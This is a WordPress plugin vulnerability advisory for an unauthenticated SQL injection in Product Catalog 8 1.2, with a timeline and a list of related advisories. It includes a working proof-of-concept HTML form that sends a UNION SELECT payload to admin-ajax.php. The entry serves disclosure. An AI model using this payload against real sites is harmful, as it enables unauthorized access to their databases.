Product Catalog 8 1.2 – Unauthenticated SQL Injection | Plugin Vulnerabilities

Description

$_POST[ ‘selectedCategory’ ] is not escaped. UpdateCategoryList() is accessible for any user.

Proof of Concept

<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>

Affects Plugins

product-catalog-8

No known fix

References

Exploitdb

URL

https://lenonleite.com.br/en/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br

Submitter twitter

Verified

No

WPVDB ID

29d95269-a36f-45aa-80a4-b683fda8520e

Timeline

Publicly Published

2016-11-28 (about 9 years ago)

Added

2016-12-06 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2014-08-01

Title

Leaflet Maps Marker - Tag Multiple Parameter SQL Injection

Published

2025-06-25

Title

Owl carousel responsive <= 1.9 - Authenticated (Contributor+) SQL Injection via id Parameter

Published

2020-10-22

Title

Advanced Booking Calendar < 1.6.2 - Unauthenticated SQL Injection

Published

2024-05-21

Title

Media Library Assistant < 3.16 - Authenticated (Contributor+) SQL Injection via Shortcode

Published

2025-06-09

Title

TicketBAI Facturas para WooCommerce < 3.21 - Unauthenticated SQL Injection